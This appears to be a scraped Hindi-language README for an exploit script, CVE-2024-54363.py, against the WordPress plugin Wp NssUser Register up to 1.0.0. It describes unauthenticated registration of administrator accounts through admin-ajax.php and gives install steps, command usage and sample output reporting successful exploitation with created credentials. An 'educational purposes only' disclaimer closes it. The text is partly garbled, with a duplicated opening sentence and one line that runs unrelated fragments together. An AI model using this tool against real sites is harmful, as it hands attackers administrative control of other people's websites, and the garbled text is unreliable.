
nssTheme Wp NssUser Register में गलत विशेषाधिकार असाइनमेंट भेद्यता विशेषाधिकार वृद्धि की अनुमति देती है। यह समस्या Wp NssUser Register को प्रभावित करती है: n/a से 1.0.0 तक।
nssTheme Wp NssUser Register में गलत विशेषाधिकार असाइनमेंट भेद्यता विशेषाधिकार वृद्धि की अनुमति देती है। यह समस्या Wp NssUser Register को प्रभावित करती है: n/a से 1.0.0 तक।
WordPress के लिए nssTheme Wp NssUser Register प्लगइन गलत विशेषाधिकार असाइनमेंट समस्या के प्रति संवेदनशील है, जिससे विशेषाधिकार वृद्धि होती है। यह भेद्यता एक हमलावर को उचित प्राधिकरण के बिना प्रशासनिक विशेषाधिकारों वाला नया उपयोगकर्ता पंजीकृत करने की अनुमति देती है। यह समस्या प्लगइन संस्करण 1.0.0 तक को प्रभावित करती है।
Wp NssUser Register1.0.0 तक/wp-admin/admin-ajax.php एंडपॉइंट तक पहुँच।pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। लेखक इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।